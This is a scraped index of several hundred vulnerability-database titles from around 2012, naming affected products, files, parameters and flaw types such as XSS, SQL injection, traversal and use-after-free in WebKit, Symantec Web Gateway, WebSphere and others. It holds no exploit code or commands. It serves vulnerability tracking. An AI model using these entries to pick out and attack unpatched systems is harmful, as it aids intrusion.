XSS [84659] IBM WebSphere MQ Multiple Space Manipulation CSRF [84658] IBM WebSphere MQ Access Restriction Bypass Unspecified Arbitrary File Access [84648] ownCloud apps/files_sharing/sharedstorage.php fopen() Function WebDAV Request File Handle Returning Shared File Manipulation [84634] Sun Java Web Server sunexamples.RealmDumpServlet Remote Information Disclosure [84604] Microsoft Windows JScript / VBScript Memory Object Size Calculation Website Handling Memory Corruption [84549] Cisco Adaptive Security Appliances (ASA) WebVPN Feature Memory Leak Remote DoS [84543] wxBitcoin / bitcoind encrypt wallet Feature BSDDB Interface Bypass Private Key Disclosure [84535] Viking Web Server Multiple Header Overflow [84521] WinWebMail Server HTML Email Message XSS [84506] Cisco IOS for Catalyst Switches Local Web Authentication Parsing Remote DoS [84494] Inout Mobile Webmail Multiple Email Field XSS [84484] Sleipnir Mobile Application for Android Website Handling Arbitrary Java Method Execution [84469] Cisco AnyConnect Secure Mobility Client IPSec WebLaunch X.509 Certificate Validation MitM Spoofing Weakness [84468] IBM WebSphere Application Server (WAS) Unspecified XSS [84455] Symantec Web Gateway deptUploads_data.php groupid Parameter SQL Injection [84444] Novell Remote Manager Small Http Interface Daemon (httpstkd) ProcessAuthorizationFailure() Function HTTP Header Parsing Remote DoS [84406] Yahoo! Toolbar for Chrome / Safari Website Handling Search Keyword Information Disclosure [84402] Ubisoft Uplay Plugin Website Handling Arbitrary Program Execution [84397] Atmail Email Server WebAdmin Control Panel Direct Request Information Disclosure [84392] Oxide WebServer Malformed HTTP GET Request Parsing Remote DoS [84380] WebKit Calendar Picker Indicator Input Type Change Event Handling Memory Corruption [84378] Google WebP Decoder CheckDecBuffer Function Integer Overflow [84377] WebKit ProcessingInstruction::removedFrom Use-after-free Issue [84374] Google Chrome WebUI Cookie Page Memory Address Disclosure Weakness [84373] Google Chrome webRequest Chrome Web Store Request Interception XSS [84369] WebKit GIFImageReader::read Function GIF Decoding Off-by-one Read Weakness [84363] icedtea-web getFirstInTableInstance() Function Unitialized Pointer Website Handling Remote Code Execution [84362] icedtea-web Non-NUL termination String Malformed Java Applet Handling Memory Corruption [84356] Dr.Web Enterprise Server Web-administrator Component Login Page username Field XSS [84327] Sysax Multi Server Boundary Error HTTP Interface Logging Folder Creation Filename Request Parsing Remote Overflow [84315] Sleipnir Mobile Application for Android WebView Class Implementation Application Handling Information Disclosure [84310] Simple Web Server HTTP Header Parsing Remote Overflow [84242] Transmission Web Client Inspector Imported Torrent File Multiple Field XSS [84212] WebKit Website Handling Unspecified Memory Corruption (2012-0683) [84211] WebKit Website Handling Unspecified Memory Corruption (2012-0682) [84210] WebKit SVG Image Handling Memory Information Disclosure [84209] WebKit File URL Handling Sandbox Bypass Arbitrary File Access Weakness [84208] WebKit WebSockets Handling HTTP Header Response Splitting [84207] WebKit Canonicalization URL Handling location.href Property XSS Weakness [84206] WebKit Dragged File Handling Path Disclosure [84205] WebKit International Domain Name (IDN) / Unicode Look-alike Character URL Bar Spoofing [84204] WebKit CSS Property Value Handling Same Origin Policy Bypass Information Disclosure [84202] WebKit Line Break Iterator Counter Content Handling Use-after-free Issue [84201] WebKit Drag and Drop Handling Same Origin Policy Bypass Arbitrary File Access [84200] WebKit Drag and Drop Handling Same Origin Policy Bypass Information Disclosure [84199] WebKit 'RenderObject::markContainingBlocksForLayout' Function Use-after-free Issue [84198] WebKit Website Handling Unspecified Memory Corruption (2012-3683) [84197] WebKit Website Handling Unspecified Memory Corruption (2012-3682) [84196] WebKit Accessibility Notifications Handling Use-after-free Issue [84195] WebKit Text Splitting Event Handler Firing Use-after-free Issue [84194] WebKit Website Handling Unspecified Memory Corruption (2012-3679) [84193] WebKit Website Handling Unspecified Memory Corruption (2012-3678) [84192] WebKit forceLayoutInlineChildren SVG &lt [84191] WebKit Event Queue Closing Use-after-free Issue [84190] WebKit Link Element Handling Use-after-free Issue [84189] WebKit 'FrameLoader::urlSelected' Function Use-after-free Issue [84188] WebKit Website Handling Unspecified Memory Corruption (2012-3667) [84187] WebKit Website Handling Unspecified Memory Corruption (2012-3666) [84186] WebKit Select Element Generated Contents Use-after-free Issue [84185] WebKit Website Handling Unspecified Memory Corruption (2012-3664) [84184] WebKit 'AccessibilityRenderObject::textUnderElement' Function Bad Cast Memory Corruption [84183] WebKit SVG Font Handling Use-after-free Issue [84182] WebKit 'RenderBlock::addChildIgnoringAnonymousColumnBlocks' Function Use-after-free Issue [84181] WebKit 'RenderRubyBase::moveChildren' Function Use-after-free Issue [84180] WebKit Removed Continuation In Multi-column Layout Access Use-after-free Issue [84179] WebKit 'RenderTableSection::rowLogicalHeightChanged' Function Use-after-free Issue [84178] WebKit Line Break Object Removal After Layout Use-after-free Issue [84177] WebKit Website Handling Unspecified Memory Corruption (2012-3644) [84176] WebKit Website Handling Unspecified Memory Corruption (2012-3642) [84175] WebKit Run Layout Isolates Parsing Use-after-free Issue [84174] WebKit 'RenderTable::computeLogicalWidth' Function Use-after-free Issue [84173] WebKit first-letter Block Processing Use-after-free Issue [84172] WebKit 'RenderBox::removeChild' Function Use-after-free Issue [84171] WebKit 'RenderBlock::removeChild' Function Anonymous Block Handling Use-after-free Issue [84170] WebKit Inline Positioned Element Handling Use-after-free Issue [84169] WebKit Table Relative Positioned Object Reparenting Use-after-free Issue [84168] WebKit Column Splitting / Appending Use-after-free Issue [84167] WebKit Website Handling Unspecified Memory Corruption (2012-3631) [84166] WebKit Website Handling Unspecified Memory Corruption (2012-3630) [84165] WebKit 'HTMLFormControlElement::removedFrom' Function Use-after-free Issue [84164] WebKit 'HTMLSelectElement::setOption' Function Use-after-free Issue [84163] WebKit 'HTMLTreeBuilder::processEndTag' Function Memory Corruption [84162] WebKit 'HTMLCollection::isAcceptableElement' Function Bad Cast Memory Corruption [84161] WebKit 'CSSStyleRule::setSelectorText' Function Use-after-free Issue [84160] WebKit ContainerNode Functions Mutation Events Handling Use-after-free Issue [84159] WebKit Preivous/Next Inline Box Search Handling Bad Cast Memory Corruption [84158] WebKit Website Handling Unspecified Memory Corruption (2012-3615) [84157] WebKit 'HTMLTreeBuilder::processIsindexStartTagForInBody' Function Bad Cast Memory Corruption [84156] WebKit Container Node Functions Mutation Events Handling Use-after-free Issue [84155] WebKit 'CompositeEditCommand::deleteInsignificantText' Function Use-after-free Issue [84154] WebKit 'ContainerNode::appendChild' Function Use-after-free Issue [84153] WebKit 'quoteCSSString' Function Overly Long String Quoting Integer Overflow Issue [84152] WebKit 'RenderBlock::handleRunInChild' Function Memory Corruption [84151] WebKit FormSubmission::create Form Submission Handling Bad Cast Memory Corruption [84150] WebKit Website Handling Unspecified Memory Corruption (2012-3600) [84149] WebKit 'AccessibilityRenderObject::childrenChanged' Function Use-after-free Issue [84148] WebKit 'NavigationScheduler::schedule' Function Use-after-free Issue [84147] WebKit 'Node::normalize' Function Use-after-free Issue [84146] WebKit 'FrameLoader::checkTimerFired' Function Use-after-free Issue [84145] WebKit Website Handling Unspecified Memory Corruption (2012-3594) [84144] WebKit Clip Mask Rendering Use-after-free Issue [84143] WebKit Website Handling Unspecified Memory Corruption (2012-3592) [84142] WebKit Unspecified Memory Corruption (2012-3591) [84141] WebKit Unspecified Memory Corruption (2012-3590) [84140] WebKit Unspecified Memory Corruption (2012-3589) [84139] WebKit Multi-column Button Layout Handling Use-after-free Issue [84136] IBM WebSphere MQ Configuration Setup SVRCONN Channel User ID Verification Queue Manager Authentication Bypass [84123] Symantec Web Gateway spywall/ldap_latest.php ip Parameter SQL Injection [84122] Symantec Web Gateway Management Console Arbitrary Password Manipulation [84121] Symantec Web Gateway Management Console Multiple Script Shell Command Execution [84120] Symantec Web Gateway spywall/pbcontrol.php filename Parameter Remote Shell Command Execution [84119] Symantec Web Gateway spywall/languageTest.php language Parameter Traversal Local File Inclusion [84118] Symantec Web Gateway Management Console spywall/blocked.php id Parameter SQL Injection [84103] Campaign Monitor Module for Drupal Admin Interface Unspecified XSS [84095] Digital Unix sysadm Interface Account Creation Cleartext Local Password Disclosure [84091] OSIsoft PI OPC DA Interface OPC Input Message Parsing Stack Buffer Overflow [84081] Heartlab Encompass Web PACS SessionStart.asp Authentication Bypass [84052] web@all my/kindeditor/index.php name Parameter XSS [84043] Yahoo! Browser for Android WebView Class Unspecified Information Disclosure [84036] Dr.Web Anti-virus for Android com.drweb.activities.antispam.CursorActivity Class SQL Query Handling Remote Information Disclosure [83974] Oracle iPlanet Web Server Unspecified Remote DoS [83924] Oracle Siebel CRM Web UI Subcomponent Unspecified Remote Issue [83888] WebsiteBaker include/idna_convert/example.php lang Parameter XSS [83856] International TeleCommunications WebBBS webbbs.exe Multiple Field Remote Overflow [83826] WebPagetest getgzip.php file Parameter Traversal Arbitrary File Access [83825] WebPagetest gettcpdump.php file Parameter Traversal Arbitrary File Access [83824] WebPagetest work/workdone.php File Upload PHP Code Execution [83823] WebPagetest work/dopublish.php File Upload PHP Code Execution [83822] WebPagetest work/resultimage.php File Upload PHP Code Execution [83821] WebPagetest delete.php testPath Traversal Arbitrary File Access [83820] WebPagetest video/download.php id Traversal Arbitrary File Access [83819] WebPagetest download.php testPath Traversal Arbitrary File Access [83818] WebPagetest gettext.php file Parameter Traversal Arbitrary File Access [83817] WebPagetest about.php cfg Cookie Parameter Traversal Local File Inclusion [83744] Netsweeper webadmin/reporter/view_details.php sortitem Parameter SQL Injection [83734] WebKit CounterNode::insertAfter Function Counter Handling Use-after-free Issue [83728] Search Autocomplete Module for Drupal Admin Interface Access Restriction Bypass [83727] WebKit Layout Height Tracking Use-after-free Issue [83699] Netsweeper webadmin/tools/local_lookup.php group Parameter XSS [83689] WebsitePanel Default.aspx ReturnURL Parameter Arbitrary Site Redirect [83688] Webify Link Directory index.php id Parameter SQL Injection [83683] Mono mcs/class/System.Web/System.Web/HttpForbiddenHandler.cs ProcessRequest() Function Query String XSS [83631] Eclydre Web Manager administrator/action/upload.php File Upload PHP Code Execution [83629] IBM WebSphere Portal Dojo Module URI Traversal Arbitrary File Access [83579] ActiveCampaign 1-2-All Broadcast E-mail Public Admin Interface Unspecified XSS [83545] Microsoft Outlook Web App owa/redir.aspx URL Parameter Arbitrary Site Redirect [83538] Webmatic index.php HTTP Header Referer: Field SQL Injection [83489] Zingiri Web Shop Plugin for WordPress wp-content/plugins/zingiri-web-shop/fws/download.php abspath Parameter Remote File Inclusion [83476] Roundcube Webmail User Account Multiple Action CSRF [83475] Roundcube Webmail index.php _user Parameter SQL Injection [83451] Mac OS Personal Web / IP Sharing Malformed Request Handling Remote Overflow [83444] WebTrends Enterprise Reporting Server POST Request Negative content-length Handling Remote DoS [83414] webERP index.php PathPrefix Parameter Remote File Inclusion [83413] SWFUpload swfupload.swf movieName Parameter ExternalInterface.call() Call XSS [83402] Symantec Web Gateway spywall/adminConfig.php Remote Command Execution [83400] webERP LanguageSetup.php PathPrefix Parameter Remote File Inclusion [83396] SpecView Web Request Parsing Traversal Arbitrary File Access [83386] Microsoft IIS Non-existent IDC File Request Web Root Path Disclosure [83352] Cisco WebEx Recording Format Player WRF File Audio Size Handling Overflow [83351] Cisco WebEx Recording Format Player WRF File Handling Memory Corruption [83350] Cisco WebEx Recording Format Player WRF File JPEG DHT Chunk Handling Overflow [83349] Cisco WebEx Recording Format Player WRF File Handling Overflow [83287] Webify Multiple Products admin/index.php page Parameter Local File Inclusion [83286] Webify Multiple Products index.php page Parameter Local File Inclusion [83285] Webify Multiple Product /admin/index.php Multiple Admin Page XSS [83284] web@all /search.php _text[title] Parameter XSS [83283] web@all File Manipulation CSRF [83281] Sysax Multi Server Admin Interface Multiple Page File Browsing Local Overflow [83268] Horde IMP Webmail Client SVG Attachment XSS [83265] Website FAQ Plugin for WordPress wp-admin/admin-ajax.php category Parameter SQL injection [83263] Symantec Message Filter Management Interface Access Permission Handling Version Information Disclosure [83257] WebKit SVGDocumentExtensions::removeAllElementReferencesForTarget Function SVG Reference Handling Use-after-free Issue [83256] WebKit RenderObject::setStyle Function First Letter Handling Use-after-free Issue [83254] WebKit WebGL texSubImage2D Floating-point Texture Upload Handling Memory Corruption [83252] WebKit iFrame Fragment ID Disclosure Frame Leak Attack Weakness [83247] WebKit Texture Conversion Out-of-bounds Read Issue [83246] WebKit RenderSVGContainer::paint Function SVG Painting Use-after-free Issue [83245] WebKit GraphicsContext::restore Function SVG Resource Handling Use-after-free Issue [83243] WebKit SVG Filter feConvolveMatrix Invalid Property Value Handling Out-of-bounds Read Issue [83242] WebKit RenderObject::container Function Counter Layout Handling Use-after-free Issue [83238] WebKit RenderTableSection::paintCell Function Table Section Handling Use-after-free Issue [83210] Opera Malformed WebGL Content Handling DoS [83193] SopCast WebPlayer sopocx.ocx ActiveX sop:// URL Handling Remote Overflow [83181] JBoss Multiple Product Java Naming and Directory Interface (JNDI) Service Access Restriction Bypass [83168] TinyWebGallery /admin/index.php user Parameter Remote PHP Code Execution [83164] IBM Lotus Expeditor Web Container Access Control Header Request Parsing Header Spoofing [83159] Cisco AnyConnect Secure Mobility Client VPN Downloader HostScan / WebLaunch Functionality Java / ActiveX Handling Downgrade Weakness [83156] IBM WebSphere Application Server (WAS) Admin Console Integration Solution Console Unspecified XSS [83155] IBM WebSphere Application Server (WAS) SSLv2 X.509 Client-certificate Authentication Bypass [83153] Western Digital ShareSpace webgui config.xml Direct Request Admin Credential Disclosure [83151] KENT-WEB WEB PATIO Unspecified Cookie XSS [83150] KENT-WEB WEB PATIO Unspecified XSS [83123] IBM WebSphere Application Server (WAS) Administration Console Unspecified XSS [83110] JBoss Multiple Products WebPermissionMapping Permission Creation Access Restriction Bypass [83096] Cisco AnyConnect Secure Mobility Client VPN Downloader WebLaunch Functionality Java / ActiveX Handling Remote Code Execution [83080] Lokomedia CMS adminweb/media.php halaman Parameter XSS [83065] EZserver Boundary Error Malformed Web Request Parsing Remote Overflow [83043] West Wind Web Connect wc.dll Configuration Manipulation Remote Privilege Escalation [83018] IBM WebSphere Application Server (WAS) iehs.war Unspecified XSS [82962] TinyWebGallery /admin/index.php Multiple Parameter XSS [82961] TinyWebGallery PHP Code Execution CSRF [82956] Zingiri Web Shop Plugin for WordPress wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php File Upload PHP Code Execution [82942] Rocket U2 UniData unidata72 RPC Interface Call Parsing Arbitrary Command Execution [82941] Quest Webthority Web SSO form-based Authentication Process CSRF [82927] Symantec Web Gateway /spywall/download_file.php Arbitrary File Access [82926] Symantec Web Gateway network.php exec() Call Remote File Inclusion [82925] Symantec Web Gateway /spywall/ipchange.php exec() Call Remote File Inclusion [82892] dailyinput Movie-Addon for webSPELL index.php portal Parameter SQL Injection [82839] HP Web Jetadmin Unspecified XSS [82820] Juniper Junos J-Web HTTP Connection Saturation CPU Utilization Remote DoS [82788] Mbedthis AppWeb File Upload Handler Unspecified Boundary Condition Issues [82787] Mbedthis AppWeb PHP Handler Malformed Form Variable Remote DoS [82786] Mbedthis AppWeb ESP/EJS Token Handling Remote Corruption DoS [82785] Mbedthis AppWeb Session Persistence Weakness [82784] Mbedthis AppWeb MaRequest:getCrackedCookie Algorithm Cookie Parsing Memory Corruption [82783] Mbedthis AppWeb Output Header Handling Remote Stack Overflow [82759] Embedthis Appweb Unspecified Security Issue [82750] Siemens SIMATIC WinCC Multiple Web Application Unspecified URL Parameter XPath System Setting Manipulation [82743] IBM WebSphere Sensor Events HTTP Method Handling Unspecified Issue [82742] IBM WebSphere Sensor Events Unspecified Directory Traversal [82740] Siemens SIMATIC WinCC DiagAgent Web Server GET Request Handling Overflow DoS [82733] Ada Web Server (AWS) Hash Function Predictable Collision Remote DoS [82730] Mozilla Multiple Product NVIDIA Driver WebGL Implementation glBufferData Function Remote Code Execution [82701] FIRSTBORN Movie-Addon for Webspell index.php id Parameter SQL Injection [82691] IBM WebSphere Sensor Events searchView.jsp Unspecified XSS [82690] IBM WebSphere Sensor Events deferredView.jsp Unspecified XSS [82689] IBM WebSphere Sensor Events Unspecified XSS [82688] Siemens SIMATIC WinCC Multiple Web Application Unspecified Traversal Arbitrary File Access [82687] Siemens SIMATIC WinCC Multiple Web Application Unspecified XSS [82684] Roundcube Webmail Embedded Image Attachment XSS [82678] IpTools Mini Webserver (Thttpd.bat) Traversal Arbitrary File Access [82628] @Web ShoppingCart Unspecified XSS [82603] TinyWebGallery /inc/filefunctions.inc command Parameter Remote Command Execution [82564] Microsoft Word WebView Crafted Metadata Handling Arbitrary Script Execution [82563] Microsoft Visual Studio WebViewFolderIcon ActiveX (MSCOMM32.OCX) Overflow [82514] Bloxx Web Filtering X-Forwarded-For HTTP Header Parsing IP Restriction Bypass [82512] Bloxx Web Filtering Configuration Backup Admin Credential Disclosure [82511] WebKit XSSAuditor Comment Tag Parsing XSS Protection Bypass Weakness [82501] Bloxx Web Filtering Appliance Customization Menu Multiple Field XSS [82500] Bloxx Web Filtering Alerts Menu Email: Destination Field XSS [82499] Bloxx Web Filtering Proxy &amp [82498] Bloxx Web Filtering Filtering Policies Menu Multiple Field XSS [82497] Bloxx Web Filtering Users &amp [82496] Bloxx Web Filtering Identification Menu Identify: Name Field XSS [82495] Bloxx Web Filtering Administrators Menu Multiple Field XSS [82481] TinyWebGallery info.php command Parameter Remote Command Execution [82477] IBM WebSphere Application Server (WAS) Snoop Servlet Request Handling Information Disclosure [82453] AutoFORM PDM Archive Web Service initializeQueryDatabase2 SOAP Request Parsing Database Information Disclosure [82414] Simple Web Content Management System /admin/item_modify.php id Parameter SQL Injection [82413] Simple Web Content Management System /admin/item_detail.php id Parameter SQL Injection [82412] Simple Web Content Management System /admin/item_status.php Multiple Parameter SQL Injection [82370] Horde Webmail Message Page XSS [82369] Horde Webmail Minimal Mailbox Page XSS [82368] Horde Webmail Dynamic Compose Page XSS [82336] Savant Web Server Remote Overflow [82242] WebKit RenderTableCell::layout Function First-letter Handling Use-after-free Issue [82221] KENT-WEB Web Mart Cookie Handling XSS [82219] KENT-WEB Web Mart CSS Support XSS [82068] Moodle admin/webservice/service.php name Parameter XSS [82035] iLunascape for Android WebView Class Unspecified Information Disclosure [82027] Tornado tornado.web.RequestHandler.set_header() Function HTTP Response Splitting [82025] Symantec Web Gateway spywall/blocked_file.php File Upload Remote Command Execution [82024] Symantec Web Gateway spywall/previewProxyError.php err Parameter Traversal Arbitrary File Access [82023] Symantec Web Gateway /spywall/releasenotes.php relfile Parameter Remote File Inclusion [82022] Symantec Web Gateway Unspecified XSS [82004] 3D Life Player WebPlayer ActiveX Multiple Boundary Error SRC Property String Parsing Remote Overflow [81963] Google Chrome for Linux WebGL Implementation glBufferData Function Remote Code Execution [81955] WebKit WebCore::GlyphPage::fill Function Glyph Handling Out-of-bounds Read Issue [81952] WebKit Worker Thread Bridge Object Handling Race Condition Use-after-free Issue [81951] WebKit WebCore::Element::recalcStyle Function Table Handling Use-after-free Issue [81948] WebKit Style Element Handling Use-after-free Arbitrary Code Execution [81946] Google Chrome Internal Page Link WebUI Renderer Process Opening Weakness [81860] IBM WebSphere Application Server (WAS) WebServer Plugin Expired plugin-key.kdb Password HTTP Communication Encryption Weakness [81853] Cisco IOS Interface Queue Wedge UDP Traffic Parsing Remote DoS [81852] Cisco Wireless Control System (WCS) TAC Case Attachment webnms/Templ/ Arbitrary File Access [81841] Cisco IOS Memory Leak NAT Interface SIP Packet Parsing Remote DoS [81829] Kerio WinRoute Firewall Embedded Web Server Source Code Disclosure [81819] Fortinet FortiWeb POST Request Parsing Web Application Firewall Policy Bypass [81792] WebKit Unspecified Memory Corruption (2012-0672) [81789] Schneider Electric Kerwin / Kerweb Searching / Displaying Content Unspecified XSS [81788] Schneider Electric Kerwin / Kerweb kw.dll evtvariablename Parameter XSS [81783] Cisco Unified MeetingPlace MP Web Unspecified XSS [81771] BigACE Web CMS /public/index.php Multiple Parameter XSS [81710] Symantec Web Gateway spywall/timer.php l Parameter XSS [81665] Zingiri Web Shop Plugin for WordPress index.php Multiple Parameter XSS [81647] WebKit RenderBlock::markSiblingsWithFloatsForLayout Intruding Float Handling Use-after-free Issue [81644] WebKit XMLDocumentParser::exitText Function XML Parsing Use-after-free Issue [81643] WebKit RenderBlock::clearFloats Intruding Float Handling Use-after-free Issue [81627] IBM AppScan / Policy Tester Scan Job Creation Website Scanning Remote Code Execution [81569] ACTi Web Configurator cgi-bin Traversal Arbitrary File Access [81546] Oracle iPlanet Web Server admingui/cchelp2/Navigator.jsp Multiple Parameter XSS [81545] Oracle iPlanet Web Server admingui/version/Masthead.jsp Multiple Parameter XSS [81539] Website Design Cardiff viewdivetrip.php id Parameter SQL Injection [81537] School Website Solutions (SWS) /calendar startdate Parameter XSS [81536] School Website Solutions (SWS) /search search Parameter XSS [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution [81521] Mozilla Multiple Product IPv6 XMLHttpRequest / WebSocket Handling Same Origin Policy Bypass [81519] Mozilla Multiple Product WebGL.drawElements() Function Template Argument Handling Video Memory Information Disclosure [81493] Zingiri Web Shop Plugin for WordPress fws/pages-front/onecheckout.php notes Parameter XSS [81492] Zingiri Web Shop Plugin for WordPress plugins/zingiri-web-shop/zing.inc.php page Parameter XSS [81478] ZyXEL GS1510 webctrl.cgi MitM Credentials Disclosure [81458] IBM Tivoli Directory Server Web Admin Tool Unspecified XSS [81454] Asterisk Manager Interface Multiple Action Handling Remote Shell Command Execution [81448] Zingiri Web Shop Plugin for WordPress Multiple Unspecified Remote Issues [81447] TwitRocker2 for Android WebView Class Information Disclosure [81443] IBM Rational ClearQuest RegisterSchemaRepoFromFileByDbSet() Function ActiveX (cqole.dll) Website Handling Remote Overflow [81440] Oracle iPlanet Web Server admingui/cchelp2/Masthead.jsp Multiple Parameter XSS [81425] Oracle Siebel Clinical Web UI Component Unspecified Remote Issue (2012-1674) [81424] Oracle Siebel Clinical Web UI Component Unspecified Remote Issue (2012-0582) [81372] Oracle Primavera P6 Enterprise Project Portfolio Management Web Application Component Unspecified Remote Issue [81367] Oracle WebCenter Forms Recognition Sssplt30.dll ActiveX SaveLayout() Method Arbitrary File Overwrite [81366] Oracle WebCenter Forms Recognition CroScPlt.dll ActiveX Save() Method Arbitrary File Overwrite [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS [81335] Cobbler Puppet Management Interface YAML String Loading Remote Code Execution [81330] WebCalendar pref.php pref_THEME Parameter Local File Inclusion [81329] WebCalendar install/index.php Access Restriction Weakness Remote Code Execution [81300] Cox Web shop.php Multiple Parameter SQL Injection [81292] Liferay Portal webdav Request Parsing Arbitrary File Access [81291] Liferay Portal JSON Webservices Admin User Creation [81280] Waylu CMS WebApps/products_xx.php id Parameter SQL Injection [81279] Waylu CMS WebApps/products_xx.php id Parameter XSS [81261] Website Toolbox cgi/members/mb_admins.cgi type Parameter XSS [81260] Website Toolbox /register Multiple Parameter XSS [81236] Oracle GlassFish Enterprise Server /web/grizzly/transports.jsf configName Parameter XSS [81235] Oracle GlassFish Enterprise Server /web/grizzly/protocols.jsf configName Parameter XSS [81234] Oracle GlassFish Enterprise Server /web/grizzly/networkListeners.jsf configName Parameter XSS [81229] Oracle GlassFish Enterprise Server /web/grizzly/networkListeners.jsf configName Parameter XSS [81193] Fastpath WebChat webapp/transcriptsrc.jsp Multiple Parameter XSS [81192] Fastpath WebChat webapp/transcriptmain.jsp Multiple Parameter XSS [81191] Fastpath WebChat webapp/style.jsp workgroup Parameter XSS [81190] Fastpath WebChat webapp/queue_updater.jsp Multiple Parameter XSS [81189] Fastpath WebChat webapp/email/offline-mail.jsp workgroup Parameter XSS [81188] Fastpath WebChat webapp/email/leave-a-message.jsp workgroup Parameter XSS [81187] Fastpath WebChat webapp/contact-agent.jsp email Parameter XSS [81186] Fastpath WebChat webapp/chatroom.jsp Multiple Parameter XSS [81185] Fastpath WebChat webapp/chatmain.jsp Multiple Parameter XSS [81184] Fastpath WebChat webapp/chat-ended.jsp workgroup Parameter XSS [81183] Fastpath WebChat webapp/agentinfo.jsp Multiple Parameter XSS [81165] McAfee Web Gateway HTTP Header Host Field Parsing URL Filter Bypass [81132] Microsoft Forefront Unified Access Gateway Default Website Configuration External Network Information Disclosure [81111] SchoolCenter Web Tools education/components/calendar/default.php et Parameter XSS [81106] Cisco WebEx Player Unspecified WRF File Handling Remote Overflow [81105] Cisco WebEx Player atas32.dll Content Decompression WRF File Handling Remote Overflow [81104] Cisco WebEx Player atdl2006.dll Content Decompression WRF File Handling Remote Overflow [81099] Goahead-Webserver Multiple Unspecified Issues [81085] Wicd Daemon DBus Interface Configuration Property Setting Local Privilege Escalation [81064] ISPConfig webdav_user_edit.php Path Verification File Permission Modification [81042] WebKit JavaScript Bindings Parenting Pop-up Window Cross-Origin Violation [81041] WebKit Source Element Evaluation DOM Modification Handling Use-after-free Issue [81037] WebKit Cross-Origin iframe Replacement Same Origin Policy Bypass [81012] MinaliC src/response.c Multiple Function Web Request Parsing Remote Overflow [80945] Advanced POWER Web Hosting update_general_set.php Setting Manipulation CSRF [80942] Charles River Web CMS search.php term Parameter XSS [80940] Pyme-Web pw/seccion_administrable.php seccion_id Parameter SQL Injection [80926] FastWeb2 fw2_landpage.php category_id Parameter XSS [80925] FastWeb2 cat_prod.php category_id Parameter XSS [80871] IBM Tivoli Directory Server Web Admin Tool Unspecified XSS [80835] Google Android WebKit Unspecified Remote Code Execution [80813] WebcamXP / Webcam7 URI Traversal Arbitrary File Access [80792] WebMatter CMS lista_productos.asp id_cat Parameter SQL Injection [80791] WebMatter CMS subcategoria.asp id_subcat Parameter SQL Injection [80761] TYPO3 Command Line Interface CLI Script Direct Request Database Name Information Disclosure [80758] AtMail Open @Mail WebMail Client install/info.php Direct Request Configuration Information Disclosure [80757] AtMail Open @Mail WebMail Client CRLF Injection mime.php file Parameter Traversal Arbitrary File Access [80756] AtMail Open @Mail WebMail Client libs/Atmail/SendMsg.php Attachment[] Parameter Traversal Arbitrary File Access [80755] AtMail Open @Mail WebMail Client compose.php Multiple Parameter Traversal Arbitrary File Access [80754] AtMail Open @Mail WebMail Client Email Attachment File Handling Remote Code Execution [80742] WebKit SVGImageBufferTools::clipToImageBuffer Function SVG Clipping Use-after-free Issue [80738] WebKit Text Fragment Handling Out-of-bounds Read Issue [80737] WebKit SVG Text Drawing Out-of-bounds Read Issue [80690] WebPortal CMS wp/FCKeditor/editor/filemanager/browser/default/browser.html Arbitrary File Upload [80640] SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS [80625] Vitalogy Web CMS company.php id_cat Parameter SQL Injection [80563] WebPAM usr_t.jsp userID Parameter HTTP Response Splitting [80562] WebPAM usr_ent.jsp userID Parameter HTTP Response Splitting [80561] WebPAM ent_i.jsp Multiple Parameter XSS [80560] WebPAM ent_i.jsp Multiple Parameter SQL Injection [80546] Cyberoam UTM /corporate/webpages/identity/ActiveDirectoryEdit.jsp Stored Credentials Remote Disclosure [80528] PHP Web Server Malformed Content-Length Header Handling Remote DoS [80482] Dr.Web Malformed CAB File Handling Scan Bypass [80432] Dr.Web Malformed ELF File Handling Scan Bypass [80373] Web Auction Output Cache Unspecified Cross-user Session Access [80370] LG-Nortel ELO GS24M Configuration Web Page Direct Request Authentication Bypass [80346] Webgrind index.php file Parameter Traversal Arbitrary File Access [80344] WebGlimpse webglimpse.cgi query Parameter Shell Metacharacter Arbitrary Command Execution [80334] Janetter Twitter Web Sites Unspecified Remote Session Disclosure [80333] WebGlimpse Calculated Cookie Admin Authentication Weakness [80332] WebGlimpse wgarcmin.cgi DOC Parameter Traversal Arbitrary File Access [80331] WebGlimpse wgarcmin.cgi DOC Parameter XSS [80330] WebGlimpse wgarcmin.cgi Crafted Request Path Disclosure [80314] WebCalendar XSS Multiple Script URI XSS [80295] Google Chrome Extension WebRequest API Extension Blacklist Request Interception Weakness [80294] WebKit Magic iframe Same Origin Policy Bypass [80292] Google Chrome Webui Privilege Isolation Weakness [80291] WebKit RenderBlock::splitBlocks Function Block Splitting Use-after-free Issue [80290] Google Chrome WebGraphicsContext3DCommandBufferImpl::FlipVertically Function Memory Corruption [80289] WebKit CSSCrossfadeValue::crossfadeChanged Function CSS Cross-fade Handling Use-after-free Issue [80288] WebKit RenderBlock::layoutInlineChildren Function :first-letter Pseudo-element Handling Use-after-free Issue [80287] Metasploit Web UI project[name] Parameter XSS [80285] Barracuda Web Application Firewall (WAF) 660 sessions_by_user filter Parameter XSS [80264] Drupal Interface Localization XSS Weakness [80218] Webfolio CMS webfolio/admin/users/edit/ Multiple Parameter XSS [80213] LiteSpeed Web Server Admin Panel service/graph_html.php gtitle Parameter XSS [80178] WebKit HTTP Authorization HTTP Header Logging Credential Disclosure [80175] WebKit Third Party Cookie Blocking Weakness [80160] General Electric (GE) Proficy Real-Time Information Portal Remote Interface Service (rifsrvd.exe) Traversal Configuration File Overwrite [80144] McAfee Email and Web Security Appliance / Email Gateway Management Console Admin Password Session Token Persistance [80143] McAfee Email and Web Security Appliance / Email Gateway Unspecified File Disclosure [80142] McAfee Email and Web Security Appliance / Email Gateway Unspecified Traversal Arbitrary File Access [80141] McAfee Email and Web Security Appliance / Email Gateway System Backup Hashed Passwords Disclosure [80140] McAfee Email and Web Security Appliance / Email Gateway Dashboard Active Session Token Disclosure [80139] McAfee Email and Web Security Appliance / Email Gateway Arbitrary Admin Password Resetting Weakness [80138] McAfee Email and Web Security Appliance / Email Gateway Unspecified XSS [80120] VMware vCenter Orchestrator Web Configuration Tool vCenter Server Password Disclosure [80097] WebCalendar install/index.php User Theme Preference Save settings.php Overwrite [80078] IBM Tivoli Endpoint Manager webreports ScheduleParam Parameter XSS [80077] Aurora WebOPAC MemberDetailsRecovery.aspx txtEmailAliasBarcode Parameter SQL Injection [80037] EJBCA ejbca/publicweb/webdist/certdist issuer Parameter XSS 